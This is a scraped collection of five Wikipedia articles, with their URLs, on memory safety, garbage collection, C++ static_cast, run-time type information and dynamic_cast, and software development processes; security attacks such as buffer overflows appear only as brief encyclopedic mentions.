Memory safetyis the state of being protected from varioussoftware bugsandsecurity vulnerabilitieswhen dealing withmemoryaccess, such asbuffer overflowsanddangling pointers.[1]For example,Javais said to be memory-safe because itsruntime error detectionchecks array bounds and pointer dereferences.[1]In contrast,CandC++allow arbitrarypointer arithmeticwith pointers implemented as direct memory addresses with no provision forbounds checking,[2]and thus are potentiallymemory-unsafe.[3] Memory errors were first considered in the context ofresource management (computing)andtime-sharingsystems, in an effort to avoid problems such asfork bombs.[4]Developments were mostly theoretical until theMorris worm, which exploited a buffer overflow infingerd.[5]The field ofcomputer securitydeveloped quickly thereafter, escalating with multitudes of newattackssuch as thereturn-to-libc attackand defense techniques such as thenon-executable stack[6]andaddress space layout randomization. Randomization prevents mostbuffer overflowattacks and requires the attacker to useheap sprayingor other application-dependent methods to obtain addresses, although its adoption has been slow.[5]However, deployments of the technology are typically limited to randomizing libraries and the location of the stack. In 2019, aMicrosoftsecurity engineer reported that 70% of all security vulnerabilities were caused by memory safety issues.[7]In 2020, a team atGooglesimilarly reported that 70% of all "severe security bugs" inChromiumwere caused by memory safety problems. Many other high-profile vulnerabilities and exploits in critical software have ultimately stemmed from a lack of memory safety, includingHeartbleed[8]and a long-standing privilege escalation bug insudo.[9]The pervasiveness and severity of vulnerabilities and exploits arising from memory safety issues have led several security researchers to describe identifying memory safety issues as"shooting fish in a barrel".[10] Some modern high-level programming languages are memory-safe by default[citation needed], though not completely since they only check their own code and not the system they interact with. Automaticmemory managementin the form ofgarbage collectionis the most common technique for preventing some of the memory safety problems, since it prevents common memory safety errors like use-after-free for all data allocated within the language runtime.[11]When combined with automaticbounds checkingon all array accesses and no support for rawpointerarithmetic, garbage collected languages provide strong memory safety guarantees (though the guarantees may be weaker for low-level operations explicitly marked unsafe, such as use of aforeign function interface). However, the performance overhead of garbage collection makes these languages unsuitable for certain performance-critical applications.[1] For languages that usemanual memory management, memory safety is not usually guaranteed by the runtime. Instead, memory safety properties must either be guaranteed by the compiler viastatic program analysisandautomated theorem provingor carefully managed by the programmer at runtime.[11]For example, theRust programming languageimplements a borrow checker to ensure memory safety,[12]whileCandC++provide no memory safety guarantees. The substantial amount of software written in C and C++ has motivated the development of external static analysis tools likeCoverity, which offers static memory analysis for C.[13] DieHard,[14]its redesign DieHarder,[15]and theAllinea Distributed Debugging Toolare special heap allocators that allocate objects in their own random virtual memory page, allowing invalid reads and writes to be stopped and debugged at the exact instruction that causes them. Protection relies upon hardware memory protection and thus overhead is typically not substantial, although it can grow significantly if the program makes heavy use of allocation.[16]Randomization provides only probabilistic protection against memory errors, but can often be easily implemented in existing software by relinking the binary. The memcheck tool ofValgrinduses aninstruction set simulatorand runs the compiled program in a memory-checking virtual machine, providing guaranteed detection of a subset of runtime memory errors. However, it typically slows the program down by a factor of 40,[17]and furthermore must be explicitly informed of custom memory allocators.[18][19] With access to the source code, libraries exist that collect and track legitimate values for pointers ("metadata") and check each pointer access against the metadata for validity, such as theBoehm garbage collector.[20]In general, memory safety can be safely assured usingtracing garbage collectionand the insertion of runtime checks on every memory access; this approach has overhead, but less than that of Valgrind. All garbage-collected languages take this approach.[1]For C and C++, many tools exist that perform a compile-time transformation of the code to do memory safety checks at runtime, such as CheckPointer[21]andAddressSanitizerwhich imposes an average slowdown factor of 2.[22] BoundWarden is a new spatial memory enforcement approach that utilizes a combination of compile-time transformation and runtime concurrent monitoring techniques.[23] Fuzz testingis well-suited for finding memory safety bugs and is often used in combination with dynamic checkers such as AddressSanitizer. Many different types of memory errors can occur:[24][25] Depending on the language and environment, other types of bugs can contribute to memory unsafety: Some lists may also includerace conditions(concurrent reads/writes to shared memory) as being part of memory safety (e.g., for access control). The Rust programming language prevents many kinds of memory-based race conditions by default, because it ensures there is at most one writerorone or more readers. Many other programming languages, such as Java, donotautomatically prevent memory-based race conditions, yet are still generally considered "memory safe" languages. Therefore, countering race conditions is generallynotconsidered necessary for a language to be considered memory safe.
https://en.wikipedia.org/wiki/Memory_safety
Incomputer science,garbage collection(GC) is a form of automaticmemory management.[2]Thegarbage collectorattempts to reclaim memory that was allocated by the program, but is no longer referenced; such memory is calledgarbage. Garbage collection was invented by American computer scientistJohn McCarthyaround 1959 to simplify manual memory management inLisp.[3] Garbage collection relieves the programmer from doingmanual memory management, where the programmer specifies what objects to de-allocate and return to the memory system and when to do so.[2]Other, similar techniques includestack allocation,region inference, and memory ownership, and combinations thereof. Garbage collection may take a significant proportion of a program's total processing time, and affectperformanceas a result. Resources other than memory, such asnetwork sockets, databasehandles,windows,filedescriptors, and device descriptors, are not typically handled by garbage collection, but rather by othermethods(e.g.destructors). Some such methods de-allocate memory also. Manyprogramming languagesrequire garbage collection, either as part of thelanguage specification(e.g.,RPL,Java,C#,D,[4]Go, and mostscripting languages) or effectively for practical implementation (e.g., formal languages likelambda calculus).[5]These are said to begarbage-collected languages. Other languages, such asCandC++, were designed for use with manual memory management, but have garbage-collected implementations available. Some languages, likeAda,Modula-3, andC++/CLI, allow both garbage collection andmanual memory managementto co-exist in the same application by using separateheapsfor collected and manually managed objects. Still others, likeD, are garbage-collected but allow the user to manually delete objects or even disable garbage collection entirely when speed is required.[6] Although many languages integrate GC into theircompilerandruntime system,post-hocGC systems also exist, such asAutomatic Reference Counting(ARC). Some of thesepost-hocGC systems do not require recompilation.[7] GC frees the programmer from manually de-allocating memory. This helps avoid some kinds oferrors:[8] GC uses computing resources to decide which memory to free. Therefore, the penalty for the convenience of not annotating object lifetime manually in the source code isoverhead, which can impair program performance.[11]A peer-reviewed paper from 2005 concluded that GC needs five times the memory to compensate for this overhead and to perform as fast as the same program using idealized explicit memory management. The comparison however is made to a program generated by inserting deallocation calls using anoracle, implemented by collecting traces from programs run under aprofiler, and the program is only correct for one particular execution of the program.[12]Interaction withmemory hierarchyeffects can make this overhead intolerable in circumstances that are hard to predict or to detect in routine testing. The impact on performance was given by Apple as a reason for not adopting garbage collection iniOS, despite it being the most desired feature.[13] The moment when the garbage is actually collected can be unpredictable, resulting in stalls (pauses to shift/free memory) scattered throughout asession. Unpredictable stalls can be unacceptable inreal-time environments, intransaction processing, or in interactive programs. Incremental, concurrent, and real-time garbage collectors address these problems, with varying trade-offs. Tracing garbage collectionis the most common type of garbage collection, so much so that "garbage collection" often refers to tracing garbage collection, rather than other methods such asreference counting. The overall strategy consists of determining which objects should be garbage collected by tracing which objects arereachableby a chain of references from certain root objects, and considering the rest as garbage and collecting them. However, there are a large number of algorithms used in implementation, with widely varying complexity and performance characteristics. Reference counting garbage collection is where each object has a count of the number of references to it. Garbage is identified by having a reference count of zero. An object's reference count is incremented when a reference to it is created and decremented when a reference is destroyed. When the count reaches zero, the object's memory is reclaimed.[14] As with manual memory management, and unlike tracing garbage collection, reference counting guarantees that objects are destroyed as soon as their last reference is destroyed, and usually only accesses memory which is either inCPU caches, in objects to be freed, or directly pointed to by those, and thus tends to not have significant negative side effects on CPU cache andvirtual memoryoperation. There are a number of disadvantages to reference counting; this can generally be solved or mitigated by more sophisticated algorithms: Escape analysisis a compile-time technique that can convertheap allocationstostack allocations, thereby reducing the amount of garbage collection to be done. This analysis determines whether an object allocated inside a function is accessible outside of it. If a function-local allocation is found to be accessible to another function or thread, the allocation is said to "escape" and cannot be done on the stack. Otherwise, the object may be allocated directly on the stack and released when the function returns, bypassing the heap and associated memory management costs.[21] Generally speaking,higher-level programming languagesare more likely to have garbage collection as a standard feature. In some languages lacking built-in garbage collection, it can be added through a library, as with theBoehm garbage collectorfor C and C++. Mostfunctional programming languages, such asML,Haskell, andAPL, have garbage collection built in.Lispis especially notable as both the firstfunctional programming languageand the first language to introduce garbage collection.[22] Other dynamic languages, such asRubyandJulia(but notPerl5 orPHPbefore version 5.3,[23]which both use reference counting),JavaScriptandECMAScriptalso tend to use GC.Object-oriented programminglanguages such asSmalltalk,ooRexx,RPLandJavausually provide integrated garbage collection. Notable exceptions areC++andDelphi, which havedestructors. BASICandLogohave often used garbage collection for variable-length data types, such as strings and lists, so as not to burden programmers with memory management details. On theAltair 8800, programs with many string variables and little string space could cause long pauses due to garbage collection.[24]Similarly theApplesoft BASICinterpreter's garbage collection algorithm repeatedly scans the string descriptors for the string having the highest address in order to compact it toward high memory, resulting inO(n2){\displaystyle O(n^{2})}performance[25]and pauses anywhere from a few seconds to a few minutes.[26]A replacement garbage collector for Applesoft BASIC byRandy Wiggintonidentifies a group of strings in every pass over the heap, reducing collection time dramatically.[27]BASIC.SYSTEM, released withProDOSin 1983, provides a windowing garbage collector for BASIC that is many times faster.[28] While theObjective-Ctraditionally had no garbage collection, with the release ofOS X 10.5in 2007Appleintroduced garbage collection forObjective-C2.0, using an in-house developed runtime collector.[29]However, with the 2012 release ofOS X 10.8, garbage collection was deprecated in favor ofLLVM'sautomatic reference counter(ARC) that was introduced withOS X 10.7.[30]Furthermore, since May 2015 Apple even forbade the usage of garbage collection for new OS X applications in theApp Store.[31][32]ForiOS, garbage collection has never been introduced due to problems in application responsivity and performance;[13][33]instead, iOS uses ARC.[34][35] Garbage collection is rarely used onembeddedor real-time systems because of the usual need for very tight control over the use of limited resources. However, garbage collectors compatible with many limited environments have been developed.[36]The Microsoft.NET Micro Framework, .NET nanoFramework[37]andJava Platform, Micro Editionare embedded software platforms that, like their larger cousins, include garbage collection. Garbage collectors available inJavaOpenJDKsvirtual machine (JVM) include: Compile-time garbage collection is a form ofstatic analysisallowing memory to be reused and reclaimed based on invariants known during compilation. This form of garbage collection has been studied in theMercury programming language,[39]and it saw greater usage with the introduction ofLLVM'sautomatic reference counter(ARC) into Apple's ecosystem (iOS and OS X) in 2011.[34][35][31] Incremental, concurrent, and real-time garbage collectors have been developed, for example byHenry Bakerand byHenry Lieberman.[40][41][42] In Baker's algorithm, the allocation is done in either half of a single region of memory. When it becomes half full, a garbage collection is performed which moves the live objects into the other half and the remaining objects are implicitly deallocated. The running program (the 'mutator') has to check that any object it references is in the correct half, and if not move it across, while a background task is finding all of the objects.[43] Generational garbage collectionschemes are based on the empirical observation that most objects die young. In generational garbage collection, two or more allocation regions (generations) are kept, which are kept separate based on the object's age. New objects are created in the "young" generation that is regularly collected, and when a generation is full, the objects that are still referenced from older regions are copied into the next oldest generation. Occasionally a full scan is performed. Somehigh-level language computer architecturesinclude hardware support for real-time garbage collection. Most implementations of real-time garbage collectors usetracing.[citation needed]Such real-time garbage collectors meethard real-timeconstraints when used with a real-time operating system.[44]
https://en.wikipedia.org/wiki/Garbage_collection_(computer_science)
In theC++programming language,static_castis anoperatorthat performs an explicittype conversion.[1] Thetypeparameter must be a data type to whichobjectcan be converted via a known method, whether it be a builtin or a cast. The type can be a reference or an enumerator. All types of conversions that are well-defined and allowed by the compiler are performed usingstatic_cast.[2][failed verification] Thestatic_cast<>operator can be used for operations such as: Althoughstatic_castconversions are checked at compile time to prevent obvious incompatibilities, norun-time type checkingis performed that would prevent a cast between incompatible data types, such as pointers. Astatic_castfrom a pointer to a classBto a pointer to a derived classDis ill-formed ifBis an inaccessible or ambiguous base ofD. Astatic_castfrom a pointer of a virtual base class (or a base class of a virtual base class) to a pointer of a derived class is ill-formed.
https://en.wikipedia.org/wiki/Static_cast
In computer programming,run-time type informationorrun-time type identification(RTTI)[1]is a feature of some programming languages (such asC++,[2]Object Pascal, andAda[3]) that exposes information about an object'sdata typeatruntime. Run-time type information may be available for all types or only to types that explicitly have it (as is the case with Ada). Run-time type information is a specialization of a more general concept calledtype introspection. In the original C++ design,Bjarne Stroustrupdid not include run-time type information, because he thought this mechanism was often misused.[4] In C++, RTTI can be used to do safetypecastsusing thedynamic_cast<>operator, and to manipulate type information at runtime using thetypeidoperator andstd::type_infoclass. In Object Pascal, RTTI can be used to perform safe type casts with theasoperator, test the class to which an object belongs with theisoperator, and manipulate type information at run time with classes contained in theRTTIunit[5](i.e. classes:TRttiContext,TRttiInstanceType, etc.). In Ada, objects of tagged types also store a type tag, which permits the identification of the type of these object at runtime. Theinoperator can be used to test, at runtime, if an object is of a specific type and may be safely converted to it.[6] RTTI is available only for classes that arepolymorphic, which means they have at least onevirtual method. In practice, this is not a limitation because base classes must have avirtual destructorto allow objects of derived classes to perform proper cleanup if they are deleted from a base pointer. Some compilers have flags to disable RTTI. Using these flags may reduce the overall size of the application, making them especially useful when targeting systems with a limited amount of memory.[7] Thetypeidreserved word(keyword) is used to determine theclassof anobjectat runtime. It returns areferencetostd::type_infoobject, which exists until the end of the program.[8]The use oftypeid, in a non-polymorphic context, is often preferred overdynamic_cast<class_type>in situations where just the class information is needed, becausetypeidis always aconstant-timeprocedure, whereasdynamic_castmay need to traverse the class derivation lattice of its argument at runtime.[citation needed]Some aspects of the returned object are implementation-defined, such asstd::type_info::name(), and cannot be relied on across compilers to be consistent. Objects of classstd::bad_typeidare thrown when the expression fortypeidis the result of applying the unary * operator on anull pointer. Whether an exception is thrown for other null reference arguments is implementation-dependent. In other words, for the exception to be guaranteed, the expression must take the formtypeid(*p)wherepis any expression resulting in a null pointer. Output (exact output varies by system and compiler): Thedynamic_castoperator inC++is used fordowncastinga reference or pointer to a more specific type in theclass hierarchy. Unlike thestatic_cast, the target of thedynamic_castmust be apointerorreferencetoclass. Unlikestatic_castandC-styletypecast (where type check occurs while compiling), a type safety check is performed at runtime. If the types are not compatible, anexceptionwill be thrown (when dealing withreferences) or anull pointerwill be returned (when dealing withpointers). AJavatypecast behaves similarly; if the object being cast is not actually an instance of the target type, and cannot be converted to one by a language-defined method, an instance ofjava.lang.ClassCastExceptionwill be thrown.[9] Suppose somefunctiontakes anobjectof typeAas its argument, and wishes to perform some additional operation if the object passed is an instance ofB, asubclassofA. This can be done usingdynamic_castas follows. Console output: A similar version ofMyFunctioncan be written withpointersinstead ofreferences: In Object Pascal andDelphi, the operatorisis used to check the type of a class at runtime. It tests the belonging of an object to a given class, including classes of individual ancestors present in the inheritance hierarchy tree (e.g.Button1is aTButtonclass that has ancestors:TWinControl→TControl→TComponent→TPersistent→TObject, where the latter is the ancestor of all classes). The operatorasis used when an object needs to be treated at run time as if it belonged to an ancestor class. The RTTI unit is used to manipulate object type information at run time. This unit contains a set of classes that allow you to: get information about an object's class and its ancestors, properties, methods and events, change property values and call methods. The following example shows the use of the RTTI module to obtain information about the class to which an object belongs, creating it, and to call its method. The example assumes that the TSubject class has been declared in a unit named SubjectUnit.
https://en.wikipedia.org/wiki/Dynamic_cast
Insoftware engineering, asoftware development processorsoftware development life cycle(SDLC) is a process of planning and managingsoftware development. It typically involves dividing software development work into smaller, parallel, or sequential steps or sub-processes to improvedesignand/orproduct management. The methodology may include the pre-definition of specificdeliverablesand artifacts that are created and completed by a project team to develop or maintain an application.[1] Most modern development processes can be vaguely described asagile. Other methodologies includewaterfall,prototyping,iterative and incremental development,spiral development,rapid application development, andextreme programming. A life-cycle "model" is sometimes considered a more general term for a category of methodologies and a software development "process" is a particular instance as adopted by a specific organization.[citation needed]For example, many specific software development processes fit the spiral life-cycle model. The field is often considered a subset of thesystems development life cycle. The software development methodology framework did not emerge until the 1960s. According to Elliott (2004), thesystems development life cyclecan be considered to be the oldest formalized methodology framework for buildinginformation systems. The main idea of the software development life cycle has been "to pursue the development of information systems in a very deliberate, structured and methodical way, requiring each stage of the life cycle––from the inception of the idea to delivery of the final system––to be carried out rigidly and sequentially"[2]within the context of the framework being applied. The main target of this methodology framework in the 1960s was "to develop large scale functionalbusiness systemsin an age of large scale business conglomerates. Information systems activities revolved around heavydata processingandnumber crunchingroutines."[2] Requirements gathering and analysis:The first phase of the custom software development process involves understanding the client's requirements and objectives. This stage typically involves engaging in thorough discussions and conducting interviews with stakeholders to identify the desired features, functionalities, and overall scope of the software. The development team works closely with the client to analyze existing systems and workflows, determine technical feasibility, and define project milestones. Planning and design:Once the requirements are understood, the custom software development team proceeds to create a comprehensive project plan. This plan outlines the development roadmap, including timelines, resource allocation, and deliverables. The software architecture and design are also established during this phase. User interface (UI) and user experience (UX) design elements are considered to ensure the software's usability, intuitiveness, and visual appeal. Development:With the planning and design in place, the development team begins the coding process. This phase involveswriting, testing, and debugging the software code. Agile methodologies, such as scrum or kanban, are often employed to promote flexibility, collaboration, and iterative development. Regular communication between the development team and the client ensures transparency and enables quick feedback and adjustments. Testing and quality assurance:To ensure the software's reliability, performance, and security, rigorous testing and quality assurance (QA) processes are carried out. Different testing techniques, including unit testing, integration testing, system testing, and user acceptance testing, are employed to identify and rectify any issues or bugs. QA activities aim to validate the software against the predefined requirements, ensuring that it functions as intended. Deployment and implementation:Once the software passes the testing phase, it is ready for deployment and implementation. The development team assists the client in setting up the software environment, migrating data if necessary, and configuring the system. User training and documentation are also provided to ensure a smooth transition and enable users to maximize the software's potential. Maintenance and support:After the software is deployed, ongoing maintenance and support become crucial to address any issues, enhance performance, and incorporate future enhancements. Regular updates, bug fixes, and security patches are released to keep the software up-to-date and secure. This phase also involves providing technical support to end users and addressing their queries or concerns. Methodologies, processes, and frameworks range from specific prescriptive steps that can be used directly by an organization in day-to-day work, to flexible frameworks that an organization uses to generate a custom set of steps tailored to the needs of a specific project or group. In some cases, a "sponsor" or "maintenance" organization distributes an official set of documents that describe the process. Specific examples include: Since DSDM in 1994, all of the methodologies on the above list except RUP have been agile methodologies - yet many organizations, especially governments, still use pre-agile processes (often waterfall or similar). Software process andsoftware qualityare closely interrelated; some unexpected facets and effects have been observed in practice.[3] Among these, another software development process has been established inopen source. The adoption of these best practices known and established processes within the confines of a company is calledinner source. Software prototypingis about creating prototypes, i.e. incomplete versions of the software program being developed. The basic principles are:[1] A basic understanding of the fundamental business problem is necessary to avoid solving the wrong problems, but this is true for all software methodologies. "Agile software development" refers to a group of software development frameworks based on iterative development, where requirements and solutions evolve via collaboration between self-organizing cross-functional teams. The term was coined in the year 2001 when theAgile Manifestowas formulated. Agile software development uses iterative development as a basis but advocates a lighter and more people-centric viewpoint than traditional approaches. Agile processes fundamentally incorporate iteration and the continuous feedback that it provides to successively refine and deliver a software system. The Agile model also includes the following software development processes: Continuous integrationis the practice of merging all developer working copies to a sharedmainlineseveral times a day.[4]Grady Boochfirst named and proposed CI inhis 1991 method,[5]although he did not advocate integrating several times a day.Extreme programming(XP) adopted the concept of CI and did advocate integrating more than once per day – perhaps as many as tens of times per day. Various methods are acceptable for combining linear and iterative systems development methodologies, with the primary objective of each being to reduce inherent project risk by breaking a project into smaller segments and providing more ease-of-change during the development process. There are three main variants of incremental development:[1] Rapid application development(RAD) is a software development methodology, which favorsiterative developmentand the rapid construction ofprototypesinstead of large amounts of up-front planning. The "planning" of software developed using RAD is interleaved with writing the software itself. The lack of extensive pre-planning generally allows software to be written much faster and makes it easier to change requirements. The rapid development process starts with the development of preliminarydata modelsandbusiness process modelsusingstructured techniques. In the next stage, requirements are verified using prototyping, eventually to refine the data and process models. These stages are repeated iteratively; further development results in "a combined business requirements and technical design statement to be used for constructing new systems".[6] The term was first used to describe a software development process introduced byJames Martinin 1991. According to Whitten (2003), it is a merger of variousstructured techniques, especially data-driveninformation technology engineering, with prototyping techniques to accelerate software systems development.[6] The basic principles of rapid application development are:[1] The waterfall model is a sequential development approach, in which development is seen as flowing steadily downwards (like a waterfall) through several phases, typically: The first formal description of the method is often cited as an article published byWinston W. Royce[7]in 1970, although Royce did not use the term "waterfall" in this article. Royce presented this model as an example of a flawed, non-working model.[8] The basic principles are:[1] The waterfall model is a traditional engineering approach applied to software engineering. A strict waterfall approach discourages revisiting and revising any prior phase once it is complete.[according to whom?]This "inflexibility" in a pure waterfall model has been a source of criticism by supporters of other more "flexible" models. It has been widely blamed for several large-scale government projects running over budget, over time and sometimes failing to deliver on requirements due to thebig design up frontapproach.[according to whom?]Except when contractually required, the waterfall model has been largely superseded by more flexible and versatile methodologies developed specifically for software development.[according to whom?]SeeCriticism of waterfall model. In 1988,Barry Boehmpublished a formal software system development "spiral model," which combines some key aspects of thewaterfall modelandrapid prototypingmethodologies, in an effort to combine advantages oftop-down and bottom-upconcepts. It provided emphasis on a key area many felt had been neglected by other methodologies: deliberate iterative risk analysis, particularly suited to large-scale complex systems. The basic principles are:[1] Shape Up is a software development approach introduced byBasecampin 2018. It is a set of principles and techniques that Basecamp developed internally to overcome the problem of projects dragging on with no clear end. Its primary target audience is remote teams. Shape Up has no estimation and velocity tracking, backlogs, or sprints, unlikewaterfall,agile, orscrum. Instead, those concepts are replaced with appetite, betting, and cycles. As of 2022, besides Basecamp, notable organizations that have adopted Shape Up include UserVoice and Block.[12][13] Other high-level software project methodologies include: Some "process models" are abstract descriptions for evaluating, comparing, and improving the specific process adopted by an organization.
https://en.wikipedia.org/wiki/Software_development_process